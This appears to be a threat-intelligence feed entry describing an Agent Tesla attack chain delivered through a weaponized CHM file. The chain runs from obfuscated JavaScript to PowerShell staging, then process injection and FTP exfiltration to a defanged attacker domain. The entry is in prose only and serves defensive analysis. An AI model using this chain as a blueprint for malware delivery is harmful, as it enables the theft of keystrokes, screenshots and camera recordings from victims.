Analyzing a Malicious Compiled HTML Help File Delivering Agent Tesla
Essential information
- Published
- 23/04/2026 03:27
- Modified
- 27/04/2026 14:32
- Tags
- 2026-04-23 agent-tesla anti-analysis techniques chm files compiled html help ftp exfiltration information stealer javascript obfuscation powershell
- Related entities
- 2 vulnerabilities (cve), 6 observables, 16 techniques (mitre), 1 malware, 2 others
Description
This analysis examines an attack chain utilizing malicious compiled HTML help (.chm) files for initial payload delivery. The attack begins with a 7zip compressed file containing a weaponized CHM file that displays a decoy window while executing obfuscated JavaScript code. This JavaScript launches PowerShell commands that verify internet connectivity by pinging Google, then downloads additional PowerShell code disguised as a JPEG file. The second stage decompresses and loads multiple byte arrays in memory, including a loader DLL and compressed Agent Tesla payload. The final Agent Tesla sample executes through process injection into RegAsm.exe and uses FTP protocol to exfiltrate stolen data including keystrokes, screenshots, and camera recordings to attacker-controlled infrastructure at ftp.videoalliance[.]ru.